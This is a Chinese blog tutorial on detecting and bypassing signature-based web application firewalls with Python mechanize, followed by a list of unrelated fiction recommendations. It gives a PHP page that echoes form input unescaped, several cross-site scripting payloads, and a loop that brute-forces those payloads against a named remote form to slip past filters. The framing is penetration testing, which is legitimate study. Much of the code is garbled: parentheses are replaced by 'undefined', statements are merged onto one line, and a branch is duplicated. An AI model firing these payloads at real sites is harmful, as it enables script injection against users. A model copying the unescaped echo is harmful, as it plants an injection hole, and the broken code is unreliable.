来检测一下你的防火墙,用Python检测并绕过Web应用程序防火墙

Web应用防火墙通常放置在Web服务器的前面,以过滤来自服务器的恶意流量。如果你去一家公司做渗透测试,他们忘记告诉你,他们使用的Web应用防火墙,可能会影响渗透测试进度。下图描绘了一个简单的Web应用程序防火墙的工作原理:

正如你可以看到它像Web流量和Web服务器之间的墙壁,通常现在Web应用防火墙是基于签名的。

什么是基于签名的防火墙?

在基于签名的防火墙中,您可以定义签名,因为您知道网络攻击也遵循类似的模式或签名。因此,我们可以定义匹配模式并阻止它们,即

Payload :- <svg><script>alert1<p>

上面定义的Payload是一种跨站点脚本攻击,我们知道所有这些攻击都可以包含以下字符“<script>”,所以为什么我们不定义一个可以阻止Web流量的签名,如果它包含这个字符串,我们可以定义2-3个签名如下:

<script>alert(*)

第一个签名将阻止包含<script>子串的任何请求,第二个将阻止警报(任何文本)。那么这就是基于签名的防火墙的工作原理。

怎么知道有防火墙?

来检测一下你的防火墙,用Python检测并绕过Web应用程序防火墙

如果您正在进行渗透测试,并且您不知道有防火墙阻塞流量,因为它可能浪费了大量的时间,因为大多数时候,您的攻击有效负载被防火墙阻止,所以,在开始渗透测试之前,首先测试Web应用程序防火墙存在是一个好主意。

大多数防火墙现在就留下一些关于它们的轨迹,现在如果您使用上面定义的有效载荷攻击网络应用程序,并获得以下响应:

HTTP/1.1 406 Not Acceptable
Date: Mon, 10 Jan 2016Server: nginx
Content-Type: text/html; charset=iso-8859-1
Not Acceptable!Not Acceptable! An appropriate representation of the

您可以清楚地看到,您的攻击被Mod_Security防火墙阻止。在本文中,我们将看到我们如何开发一个简单的python脚本,可以执行此任务检测防火墙并绕过它。

步骤1:定义HTML文档和PHP脚本!

我们必须定义我们的HTML文档来注入有效载荷和相应的PHP脚本来处理数据。我们在下面定义了这两个。

我们将使用以下HTML文档:

<html>
<body>
<form name="waf" action="waf.php" method="post">
Data: <input type="text" name="data"><br>
<input type="submit" value="Submit">
</form>
</body>
</html>

PHP脚本:

<html>
<body>
Data from the form : <?php echo $_POST["data"]; ?><br>
</body>
</html>

步骤2:准备恶意请求!

检测防火墙存在的第二步是创建一个可以被防火墙阻止的恶意跨站脚本请求。我们将使用一个名为“Mechanize”的python模块

现在您了解了Mechanize,我们可以选择任何页面上提供的Web表单并提交请求。以下代码片段可用于做到这一点:

import mechanize as mecmalicious
Request = mec.Browser()
formName = 'waf'maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")maliciousRequest.select_form(formName)

让我们明白这个代码行:

在第一行,我们导入了mechanize模块,并给它一个简称'mec'供以后参考。

要使用mechanize下载网页,需要实例化浏览器。我们已经在代码的第二行中做到了。

在第一步,我们定义了我们的HTML文档,其中表单名称为“waf”,我们需要告诉mechanize选择此表单提交,因此我们在名为formName的变量中使用此名称。

比我们打开这个URL,就像我们在浏览器中一样。页面打开后,我们填写表单并提交数据,因此页面的打开与此相同。

最后我们选择了使用'select_form'函数传递它'formName'变量的形式。

正如你可以在HTML源代码中看到的那样,这个表单只有一个输入字段,我们将在该字段中注入我们的payload,一旦我们收到响应,我们将检查它的字符串以检测是否存在Web应用防火墙。

步骤3:准备有效载荷

在我们的HTML文档中,我们使用以下代码指定了一个输入字段:

<input type =“text”name =“data”> <br>

您可以看到该字段的名称是“data”,我们可以使用以下代码定义此字段的输入:

crossSiteScriptingPayLoad = "<svg><script>alert`1`<p>"
maliciousRequest.form['data'] = crossSiteScriptingPayLoad

第一行将我们的有效载荷保存在变量中。

在第二行代码中,我们已将我们的有效内容分配给表单字段“数据”。

我们现在可以安全地提交此表格并检查答复。

步骤4:提交表单并记录回复

代码我将在此行提及后提交表单并记录回复:

maliciousRequest.submit()
response=maliciousRequest.response().read()
print response

提交表单

将响应保存在变量中。

打印回应。

由于我目前没有安装防火墙,所以我得到的响应是:

来检测一下你的防火墙,用Python检测并绕过Web应用程序防火墙

可以看到有效载荷被打印回我们,意味着应用程序代码中不存在过滤,并且由于没有防火墙,我们的请求也没有被阻止。

步骤5:检测防火墙的存在

名为“response”的变量包含从服务器获得的响应,我们可以使用响应来检测防火墙的存在。我们将尝试在本教程中检测到以下防火墙的存在。

WebKnight
mod_security
Dot Defender

看看我们如何用python代码实现这一点:

if response.find('WebKnight') >= 0:
 print "Firewall detected: WebKnight"
elif response.find('Mod_Security') >= 0: 
 print "Firewall detected: Mod Security"
elif response.find('Mod_Security') >= 0:
 print "Firewall detected: Mod Security"
elif response.find('dotDefender') >= 0:
 print "Firewall detected: Dot Defender"
else:
 print "No Firewall Present"

如果安装Web Knight防火墙并且我们的请求被阻止,响应字符串将在其中包含“WebKnight”,那么find函数将返回大于0的值,这意味着WebKnight防火墙存在。同样,我们也可以检查其他2个防火墙。

我们可以扩展这个小应用程序来检测多少个防火墙,但您必须知道响应行为。

使用强力来绕过防火墙过滤器

我在文章的开头提到,大多数防火墙都基于签名阻止请求。但是,您可以使用数千种方式构建payload。javascript比较复杂,我们可以列出有效负载,并尝试其中的每一个,记录每个响应并检查是否能够绕过防火墙。请注意,如果防火墙规则被明确定义,则此方法可能无法正常工作。让我们看看我们如何使用python来强爆:

listofPayloads = ['<dialog open="" onclose="alertundefined1)"><form method="dialog"><button>Close me!</button></form></dialog>', '<svg>
<script>prompt( 1)<i>', '<a href="javascript:alertundefined1)">CLICK ME<a>']
for payLoads in listofPayloads:
 maliciousRequest = mec.Browserundefined)
 formName = 'waf' maliciousRequest.openundefined"http://check.cyberpersons.com/crossSiteCheck.html") maliciousRequest.select_formundefinedformName) maliciousRequest.form['data'] = payLoads maliciousRequest.submitundefined)
 response = maliciousRequest.responseundefined).readundefined)
 if response.findundefined'WebKnight') >= 0:
 print "Firewall detected: WebKnight" 
 elif response.findundefined'Mod_Security') >= 0:
 print "Firewall detected: Mod Security"
 elif response.findundefined'Mod_Security') >= 0:
 print "Firewall detected: Mod Security"
 elif response.findundefined'dotDefender') >= 0:
 print "Firewall detected: Dot Defender"
 else: 
 print "No Firewall Present"

在第一行,我们定义了3个有效载荷的列表,您可以扩展此列表,并根据需要添加多个有效负载。

然后在for循环中,我们做了与上面所做的相同的过程,但是这一次对于列表中的每个有效载荷。

收到响应后,我们再次比较看看防火墙是否存在。

因为我没有安装防火墙,我的输出是:

来检测一下你的防火墙,用Python检测并绕过Web应用程序防火墙

将HTML标签转换为Unicode或Hex实体

如果防火墙正在过滤html标签,如<>。我们可以发送相应的Unicode或Hex实体,看看它们是否被转换为原始形式,如果是这样,那么这也可能是一个入口点。以下代码可用于检查此过程:

listofPayloads = ['<b>','u003cbu003e','x3cbx3e']
 for payLoads in listofPayloads: 
 maliciousRequest = mec.Browser()
 formName = 'waf'
 maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html") maliciousRequest.select_form(formName)
 maliciousRequest.form['data'] = payLoads
 maliciousRequest.submit()
 response = maliciousRequest.response().read()
 print "---------------------------------------------------"
 print response
 print "---------------------------------------------------"

每次我们将发送编码的数据,在响应中,我们将检查是否转换或打印回而不进行转换,当我运行这个代码,我得到了这个输出:

来检测一下你的防火墙,用Python检测并绕过Web应用程序防火墙

表示没有编码的数据被转换为其原始格式。

结论

本文的目的是让您了解web应用防火墙,测试您网络的安全性,很多时候我们首先关心的应用程序的稳定性,但是我们忽略了安全部分,导致后期出现了严重的安全问题。

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 213,558评论 6 492
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,002评论 3 387
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 159,036评论 0 349
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,024评论 1 285
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,144评论 6 385
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,255评论 1 292
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,295评论 3 412
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,068评论 0 268
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,478评论 1 305
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,789评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,965评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,649评论 4 336
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,267评论 3 318
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,982评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,223评论 1 267
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,800评论 2 365
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,847评论 2 351

推荐阅读更多精彩内容